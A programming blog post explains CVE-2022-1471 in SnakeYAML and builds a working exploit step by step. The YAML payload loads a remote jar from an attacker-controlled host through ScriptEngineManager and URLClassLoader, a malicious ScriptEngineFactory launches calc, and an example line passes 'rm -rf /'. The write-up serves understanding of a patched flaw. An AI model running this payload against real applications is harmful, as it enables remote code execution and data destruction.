mscharhag, Programming and Stuff

A blog about programming and software development topics, mostly focused on Java technologies including Java EE, Spring and Grails.

Tuesday, 6 June, 2023

Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

In this post we will take a closer look at SnakeYAML and CVE-2022-1471.

SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.

In late 2022, a critical vulnerability in SnakeYAML was disclosed and is tracked as CVE-2022-1471. It allows an attacker to achieve remote code execution by supplying a malicious YAML file to an application that parses it with a vulnerable SnakeYAML version. The problem was fixed in SnakeYAML 2.0, released in February 2023.

I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.

Parsing YAML files with SnakeYAML

Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.

Suppose we have the following YAML file named person.yml:

person:
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

In our Java code we can parse this YAML file with SnakeYAML like this:

Yaml yaml = new Yaml();
Map<String, Object> parsed;
// try-with-resources closes the stream once parsing is done
try (FileInputStream fis = new FileInputStream("/path/to/person.yml")) {
    parsed = yaml.load(fis);
}

Map<String, Object> person = (Map<String, Object>) parsed.get("person");
person.get("firstname");  // "john"
person.get("lastname");   // "doe"
person.get("address");    // another map with keys "street" and "city"

yaml.load(fis) returns a Map<String, Object> instance that we can navigate through to get the values defined in the YAML file.
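To illustrate what navigating such a result looks like in practice, here is a minimal sketch that uses only the JDK. The lookup helper and the samplePersonDocument method are hypothetical names introduced for this example; the hand-built map only mirrors the structure we would expect from parsing person.yml and does not call SnakeYAML itself.

```java
import java.util.LinkedHashMap;
import java.util.Map;

class NestedMapLookup {

    // Walks nested maps along the given keys. Returns null if a key is
    // missing or an intermediate value is not a map.
    public static Object lookup(Map<String, Object> root, String... path) {
        Object current = root;
        for (String key : path) {
            if (!(current instanceof Map)) {
                return null;
            }
            current = ((Map<?, ?>) current).get(key);
        }
        return current;
    }

    // Hand-built stand-in for the parsed content of person.yml
    public static Map<String, Object> samplePersonDocument() {
        Map<String, Object> address = new LinkedHashMap<>();
        address.put("street", "fooway 42");
        address.put("city", "baz town");

        Map<String, Object> person = new LinkedHashMap<>();
        person.put("firstname", "john");
        person.put("lastname", "doe");
        person.put("address", address);

        Map<String, Object> document = new LinkedHashMap<>();
        document.put("person", person);
        return document;
    }

    public static void main(String[] args) {
        Map<String, Object> parsed = samplePersonDocument();
        System.out.println(lookup(parsed, "person", "address", "city")); // prints: baz town
        System.out.println(lookup(parsed, "person", "email"));           // prints: null
    }
}
```

Even with a helper like this, every value comes back as Object and needs a cast, which is the main reason mapping to typed objects is attractive.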

Mapping YAML content to objects

Unfortunately, working with nested maps is usually not very pleasant, so SnakeYAML provides several ways to map YAML content to Java objects.

One way is to use the !! syntax to set a Java type within a YAML object:

person:
  !!demo.Person
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

This tells SnakeYAML to map the contents of the person object to the demo.Person Java class, which looks like this:

public class Person {
    private String firstname;
    private String lastname;
    private Address address; // has getter and setter for street and city

    // getter and setter
}

We can now parse the YAML file and get the person object with the mapped YAML values like this:

Map<String, Object> parsed = yaml.load(fis);
Person person = (Person) parsed.get("person");

SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.
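Conceptually, this setter-based mapping can be pictured with plain reflection. The following is only a rough sketch of the idea and not SnakeYAML's actual implementation: the bind helper is a hypothetical name, the nested Person class is a reduced stand-in for demo.Person, and only String properties are handled.

```java
import java.lang.reflect.Method;
import java.util.LinkedHashMap;
import java.util.Map;

class SetterBindingSketch {

    // Reduced stand-in for demo.Person (the address property is omitted)
    public static class Person {
        private String firstname;
        private String lastname;

        public String getFirstname() { return firstname; }
        public void setFirstname(String firstname) { this.firstname = firstname; }
        public String getLastname() { return lastname; }
        public void setLastname(String lastname) { this.lastname = lastname; }
    }

    // Creates the named class via its no-arg constructor and calls
    // set<Key>(String) for every entry of the given map.
    public static Object bind(String className, Map<String, String> values) {
        try {
            Class<?> type = Class.forName(className);
            Object target = type.getDeclaredConstructor().newInstance();
            for (Map.Entry<String, String> entry : values.entrySet()) {
                String key = entry.getKey();
                String setterName = "set" + Character.toUpperCase(key.charAt(0)) + key.substring(1);
                Method setter = type.getMethod(setterName, String.class);
                setter.invoke(target, entry.getValue());
            }
            return target;
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("Could not bind " + className, e);
        }
    }

    public static void main(String[] args) {
        Map<String, String> values = new LinkedHashMap<>();
        values.put("firstname", "john");
        values.put("lastname", "doe");
        Person person = (Person) bind(Person.class.getName(), values);
        System.out.println(person.getFirstname() + " " + person.getLastname()); // prints: john doe
    }
}
```

The important detail is that the class name is just a string. Whoever controls that string decides which class gets instantiated.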

For example, suppose we have the following simple Email value object:

public class Email {
    private String value;

    public Email(String value) {
        this.value = value;
    }

    // getter
}

Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:

person:
  firstname: john
  lastname: doe
  email: !!demo.Email [ john@doe.com ]

Where is the security issue?

What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.

Assume for a moment that a RunSystemCommand class is available on the classpath. This class executes the system command passed to its constructor as soon as an instance is created. We could then provide the following YAML file:

foo: !!bad.code.RunSystemCommand [ rm -rf / ]

This would run the rm -rf / system command as soon as SnakeYAML instantiates the class.
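The underlying problem, a constructor with side effects that is reachable through a class name taken from input, can be shown with a harmless sketch. RecordCommand is a hypothetical stand-in for RunSystemCommand that only records the command instead of executing it, and instantiate is a hypothetical helper that imitates the constructor call with reflection. This is not how SnakeYAML is implemented internally, it only illustrates the effect.

```java
import java.lang.reflect.Constructor;
import java.util.ArrayList;
import java.util.List;

class ConstructorSideEffectSketch {

    // Collects the commands a real gadget class would have executed
    public static final List<String> EXECUTED = new ArrayList<>();

    // Harmless stand-in for the hypothetical bad.code.RunSystemCommand
    public static class RecordCommand {
        public RecordCommand(String command) {
            // A real gadget would run the command here; we only record it
            EXECUTED.add(command);
        }
    }

    // Looks up the class by name and calls its single-String constructor
    public static Object instantiate(String className, String argument) {
        try {
            Constructor<?> constructor = Class.forName(className).getConstructor(String.class);
            return constructor.newInstance(argument);
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("Could not instantiate " + className, e);
        }
    }

    public static void main(String[] args) {
        // Class name and argument play the role of the values taken from the YAML file
        instantiate(RecordCommand.class.getName(), "echo hello");
        System.out.println(EXECUTED); // prints: [echo hello]
    }
}
```

The side effect happens during construction, before the calling code ever gets a chance to inspect the created object.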

Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.

However, the standard Java library contains some interesting classes that can be used instead. A very promising combination is ScriptEngineManager together with URLClassLoader. We will now learn a bit more about these two classes before we integrate them into a YAML file.

Loading remote code via URLClassLoader

URLClassLoader is a Java ClassLoader that can load classes and resources from jar files located at a specified URL. We can create a URLClassLoader like this:

URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);

URLClassLoader takes an array of URLs as constructor parameter. Here we pass a single URL pointing to a jar file on a remote server controlled by the attacker. Our classLoader instance can now be used to load classes from the remote jar file.

If you are curious about how to load a class from a ClassLoader and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.

// load class foo.bar.BadCode using the classLoader
Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");

// create a new instance of foo.bar.BadCode using the default constructor
// (Class.newInstance() is deprecated since Java 9)
Object instance = loadedClass.getDeclaredConstructor().newInstance();

// run the method runMaliciousCode() on our new instance
Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
runMaliciousCode.invoke(instance);

Using ScriptEngineManager to run code for us

ScriptEngineManager is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. ScriptEngineManager uses the Java Service Provider mechanism to discover and instantiate available ScriptEngineFactory classes.

The ClassLoader used by ScriptEngineManager can be passed as a constructor parameter:

URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

Here, the newly created ScriptEngineManager will look for ScriptEngineFactory implementations in our attacker-controlled remote jar. More dangerously, it will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.

But what content must be provided in the remote jar file?

We start by creating a malicious implementation of ScriptEngineFactory:

package foo.bar;

public class BadScriptEngineFactory implements ScriptEngineFactory {
    @Override
    public String getEngineName() {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return null;
    }

    // empty stubs for other interface methods
}

The first method that ScriptEngineManager calls after instantiating a ScriptEngineFactory is getEngineName(), so we use this method to execute our malicious code. In this example, we simply run the calc system command, which starts the calculator on a Windows system. This is a simple proof that we can run a system command from the provided jar file.

As mentioned earlier, ScriptEngineManager uses the Java Service Provider mechanism to find classes that implement the ScriptEngineFactory interface.

So we need to create a service provider configuration for our ScriptEngineFactory. We do this by creating a file called javax.script.ScriptEngineFactory in the META-INF/services directory. This file must contain the fully qualified name of our ScriptEngineFactory:

foo.bar.BadScriptEngineFactory
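To see the Service Provider mechanism in isolation, here is a minimal sketch that uses only the JDK. Greeter and HelloGreeter are hypothetical names standing in for ScriptEngineFactory and BadScriptEngineFactory, and the configuration file is written to a temporary directory instead of being packaged into a jar. The discovery step goes through java.util.ServiceLoader, the standard JDK entry point for this mechanism.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.ServiceLoader;

class ServiceProviderSketch {

    // Hypothetical service interface (plays the role of ScriptEngineFactory)
    public interface Greeter {
        String greet();
    }

    // Hypothetical provider (plays the role of BadScriptEngineFactory)
    public static class HelloGreeter implements Greeter {
        @Override
        public String greet() {
            return "hello from provider";
        }
    }

    // Writes META-INF/services/<interface name> into a temp directory and lets
    // ServiceLoader discover and instantiate the provider named in that file.
    public static List<String> discover() {
        try {
            Path root = Files.createTempDirectory("provider-demo");
            Path services = Files.createDirectories(root.resolve("META-INF").resolve("services"));
            Files.write(services.resolve(Greeter.class.getName()),
                    HelloGreeter.class.getName().getBytes(StandardCharsets.UTF_8));

            URL[] urls = { root.toUri().toURL() };
            List<String> greetings = new ArrayList<>();
            ClassLoader parent = ServiceProviderSketch.class.getClassLoader();
            try (URLClassLoader loader = new URLClassLoader(urls, parent)) {
                for (Greeter greeter : ServiceLoader.load(Greeter.class, loader)) {
                    greetings.add(greeter.greet());
                }
            }
            // The temp directory is left behind; a real program should clean it up
            return greetings;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(discover());
    }
}
```

Note that our code never mentions HelloGreeter when loading. The provider is chosen solely by the content of the configuration file that the class loader can see.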

We then package the class and configuration file into a jar file called malicious-code.jar. The final layout inside the jar file looks like this:

  • malicious-code.jar
    • META-INF
      • services
        • javax.script.ScriptEngineFactory
      • MANIFEST.MF
    • foo
      • bar
        • BadScriptEngineFactory.class

We can now put this jar file on a server and make it available to the URLClassLoader used by the ScriptEngineManager.

To recap the snippet shown earlier:

URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

ScriptEngineManager should now detect the BadScriptEngineFactory class within the malicious-code.jar file. Once instantiated, it calls the getEngineName() method, which executes the calc system command. So running this code on a Windows system should open the Windows Calculator.

Constructing a malicious YAML file

Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.

So the final YAML file looks like this:

person: !!javax.script.ScriptEngineManager [
    !!java.net.URLClassLoader [[
        !!java.net.URL [http://attacker.com/malicious-code.jar]
    ]]
]

We create a simple person YAML object. For the value we use the !! syntax we saw earlier to create a ScriptEngineManager.

As a constructor parameter we pass a URLClassLoader with a URL pointing to our malicious jar file. Notice that we open two square brackets after URLClassLoader. The first indicates that constructor arguments follow, the second defines an array that is passed as the single argument.
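The two levels of square brackets may be easier to see when the same call is written with reflection. This is a sketch of the idea only, not SnakeYAML's actual constructor resolution; the build helper and the file URL used in main are placeholders introduced for this example.

```java
import java.lang.reflect.Constructor;
import java.net.MalformedURLException;
import java.net.URI;
import java.net.URL;
import java.net.URLClassLoader;

class ArrayConstructorArgumentSketch {

    public static URLClassLoader build(String location) {
        try {
            URL url = URI.create(location).toURL();

            // Inner brackets in the YAML file: the URL[] array itself
            URL[] urlArray = { url };

            // Outer brackets in the YAML file: the constructor argument list,
            // which contains exactly one argument (the array)
            Constructor<URLClassLoader> constructor =
                    URLClassLoader.class.getConstructor(URL[].class);

            // The cast to Object prevents the array from being spread
            // over the varargs parameter of newInstance(...)
            return constructor.newInstance((Object) urlArray);
        } catch (ReflectiveOperationException | MalformedURLException e) {
            throw new IllegalStateException("Could not create class loader for " + location, e);
        }
    }

    public static void main(String[] args) {
        // Placeholder location; the file does not need to exist for this demo
        URLClassLoader loader = build("file:///tmp/malicious-code.jar");
        System.out.println(loader.getURLs().length); // prints: 1
    }
}
```

Without the inner array, the lookup would need a constructor that takes a single URL, and URLClassLoader does not offer one.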

When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.
